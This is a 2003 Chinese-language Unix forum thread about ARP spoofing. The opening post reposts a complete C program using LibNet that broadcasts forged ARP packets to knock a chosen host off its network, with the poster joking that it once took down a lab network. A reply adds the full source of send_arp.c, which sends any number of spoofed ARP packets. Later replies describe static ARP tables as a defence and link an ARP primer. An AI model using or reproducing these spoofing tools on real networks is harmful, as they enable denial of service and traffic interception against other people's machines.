动态ARP可导致整个TCP/IP网络中断(页 1) - 网络 & 安全 - LoveUnix 最强AIX小机技术论坛,UNIX,Linux,存储,数据库,中间件,开发,管理

2003-11-17 08:36 threehair

转自安全焦点 动态ARP可导致整个TCP/IP网络中断 -------------------------------------------------------------------- <div class='codetop'>CODE</div><div class='codemain'>/*  当年我就使用他作实验时把openlab给断了一会儿   hehe    不要扁我喔  */ /* 程序名：Arp_break_net.c 用途  ：演示通过ARP数据包使网络中的某主机无法连接网络        演示中192.168.0.1 将无法连接进入网络 编写  ：cloud 时间  ：2001-2-11 其他  ：程序依赖LibNet */ #include<libnet.h> u_char enet_src[6] = {0,0,0,0};  //源MAC地址  (伪造的一个不存在MAC地址) u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; //目标MAC地址（广播地址) u_char ip_src[4]   = {192,168,0,1};             //源IP地址  (被踢出网络的IP地址） u_char ip_dst[4]   = {192,168,0,255};           //目标IP地址（随便一个IP地址） int main(int argc, char *argv[]) {    int  c;    char errbuf[256];    char *device = "eth0";            //数据包从第一个网卡发送出去    struct libnet_link_int *l;    l = libnet_open_link_interface(device, errbuf);   //打开设备    if (!l)    {        fprintf(stderr, "libnet_open_link_interface: %sn", errbuf);        exit(EXIT_FAILURE);    }    c = send_arp(l, device);                         //发送ARP数据包    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); } int send_arp(struct link_int *l, u_char *device) {    int n;    u_char *buf;    if (libnet_init_packet(ARP_H + ETH_H, &buf) == -1)    {        perror("libnet_init_packet memory:");        exit(EXIT_FAILURE);    }    /*     * 构造以太数据包头部信息     */    libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf);    /*     *  构造ARP数据包头部信息     */    libnet_build_arp(ARPHRD_ETHER,        ETHERTYPE_IP,        6,        4,        ARPOP_REQUEST,        enet_src,        ip_src,        enet_dst,        ip_dst,        NULL,        0,        buf + ETH_H);    n = libnet_write_link_layer(l, device, buf, ARP_H + ETH_H);  //发送数据包    printf("Wrote %d byte ARP packet through linktype %dn", n, l->linktype);    libnet_destroy_packet(&buf);    return (n); }</div>

2003-11-17 09:31 soccer_hou007

怎么会中断呢？ <img src='style_emoticons/default/ohmy.gif' border='0' style='vertical-align:middle' alt='ohmy.gif' />

2003-11-17 12:54 i2era

ethernet在二层上毫无安全性可言 arp永远是它的软肋 PS:win32(98/me/2K/XP)在收到大量arp包时会停止响应，重起后不能进入系统（如果发送方仍未停止） send_arp.c，一个很老的程序了，我还曾经想把它移植到*BSD上，不过功力不够 <img src='style_emoticons/default/blush.gif' border='0' style='vertical-align:middle' alt='blush.gif' /> <div class='quotetop'>QUOTE</div><div class='quotemain'>/* This program sends out one ARP packet with source/target IP and Ethernet hardware addresses suuplied by the user. It  compiles and works on Linux and will probably work on any  Unix that has SOCK_PACKET. volobuev@t1.chem.umn.edu  */  #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <stdio.h> #include <errno.h> #include <sys/ioctl.h> #include <net/if.h> #include <signal.h> #include <netinet/ip.h> #include <netinet/in.h> #include <string.h> #include <arpa/inet.h> #include <netinet/ip_icmp.h> #include <linux/if_ether.h> #define ETH_HW_ADDR_LEN 6  #define IP_ADDR_LEN 4  #define ARP_FRAME_TYPE 0x0806  #define ETHER_HW_TYPE 1  #define IP_PROTO_TYPE 0x0800  #define OP_ARP_REQUEST 2  #define OP_ARP_QUEST 1 #define DEFAULT_DEVICE "eth0"  char usage[] = {"send_arp: sends out custom ARP packet. yuri volobuev    usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number"};  struct arp_packet  {  u_char targ_hw_addr[ETH_HW_ADDR_LEN];  u_char src_hw_addr[ETH_HW_ADDR_LEN];  u_short frame_type;  u_short hw_type;  u_short prot_type;  u_char hw_addr_size;  u_char prot_addr_size;  u_short op;  u_char sndr_hw_addr[ETH_HW_ADDR_LEN];  u_char sndr_ip_addr[IP_ADDR_LEN];  u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];  u_char rcpt_ip_addr[IP_ADDR_LEN];  u_char padding[18];  };  void die (char *);  void get_ip_addr (struct in_addr *, char *);  void get_hw_addr (char *, char *);  int main (int argc, char * argv[])  {  struct in_addr src_in_addr, targ_in_addr;  struct arp_packet pkt;  struct sockaddr sa;  int sock;  int j,number; if (argc != 6)  die(usage);  sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_RARP));  if (sock < 0)  {  perror("socket");  exit(1);  }  number=atoi(argv[5]); pkt.frame_type = htons(ARP_FRAME_TYPE);  pkt.hw_type = htons(ETHER_HW_TYPE);  pkt.prot_type = htons(IP_PROTO_TYPE);  pkt.hw_addr_size = ETH_HW_ADDR_LEN;  pkt.prot_addr_size = IP_ADDR_LEN;  pkt.op = htons(OP_ARP_QUEST);  get_hw_addr(pkt.targ_hw_addr, argv[4]);  get_hw_addr(pkt.rcpt_hw_addr, argv[4]);  get_hw_addr(pkt.src_hw_addr, argv[2]);  get_hw_addr(pkt.sndr_hw_addr, argv[2]);  get_ip_addr(&src_in_addr, argv[1]);  get_ip_addr(&targ_in_addr, argv[3]);  memcpy(pkt.sndr_ip_addr, &src_in_addr, IP_ADDR_LEN);  memcpy(pkt.rcpt_ip_addr, &targ_in_addr, IP_ADDR_LEN);  bzero(pkt.padding,18);  strcpy(sa.sa_data,DEFAULT_DEVICE);  for (j=0;j<number;j++) { if (sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0)  {  perror("sendto");  exit(1);  }   } exit(0);  }  void die (char *str)  {  fprintf(stderr,"%s\n",str);  exit(1);  }  void get_ip_addr (struct in_addr *in_addr, char *str)  {  struct hostent *hostp;  in_addr->s_addr = inet_addr(str);  if(in_addr->s_addr == -1) {  if ((hostp = gethostbyname(str)))  bcopy(hostp->h_addr, in_addr, hostp->h_length);  else {  fprintf(stderr, "send_arp: unknown host %s\n", str);  exit(1);       }  }  }  void get_hw_addr (char *buf, char *str)  {  int i;  char c, val;  for(i = 0; i < ETH_HW_ADDR_LEN; i++)  {  if (!(c = tolower(*str++)))  die("Invalid hardware address");  if (isdigit©)  val = c - '0';  else if (c >= 'a' && c <= 'f')  val = c-'a'+10;       else  die("Invalid hardware address");  *buf = val << 4;  if (!(c = tolower(*str++)))  die("Invalid hardware address");  if (isdigit©)  val = c - '0';  else if (c >= 'a' && c <= 'f')  val = c-'a'+10;       else  die("Invalid hardware address");  *buf++ |= val;  if (*str == ':')  str++;  }  } </div>

2003-11-17 13:05 i2era

由此我使用了一种很简单的控制手段(layer2)： 在server上： ifconfig interface down ifconfig interface -arp //Disable the use of the Address Resolution Protocol. ifconfig interface up add client ip and mac to file(ip.mac.list) arp -f ip.mac.list 在client上: arp -s SERVER.ip SERVER.ether_addr 这样只有那些在ip.mac.list里的client才能与server通信（双向交流）

2003-11-18 10:02 rhinofly

<div class='quotetop'>QUOTE(i2era @ 2003-11-17 13:05:24)</div><div class='quotemain'> 由此我使用了一种很简单的控制手段(layer2)： 在server上： ifconfig interface down ifconfig interface -arp  //Disable the use of the Address Resolution Protocol. ifconfig interface up add client ip and mac to file(ip.mac.list) arp -f ip.mac.list 在client上: arp -s SERVER.ip SERVER.ether_addr 这样只有那些在ip.mac.list里的client才能与server通信（双向交流） </div> 是个办法。。。。。。。。如果由200台机器，不要累死啊？

2003-11-18 13:36 i2era

200个ip还勉强凑合，要是有2的N次方个就只能 <img src='style_emoticons/default/shut.gif' border='0' style='vertical-align:middle' alt='shut.gif' /> 所以说是一种很简单的控制手段 <img src='style_emoticons/default/ninja.gif' border='0' style='vertical-align:middle' alt='ninja.gif' />

2003-11-18 22:27 波波蛋儿

我写了一篇ARP协议的入门文章 希望初学者读了，对理解上面的文章有帮助 <a href='http://www.ossh.org/Frame/index.asp?/os/learn/arpp.html' target='_blank'>http://www.ossh.org/Frame/index.asp?/os/learn/arpp.html</a>

2004-2-27 15:17 fire9

很好的网站,我支持!可是我不会编程.

2004-6-2 02:58 阿土

顶出来。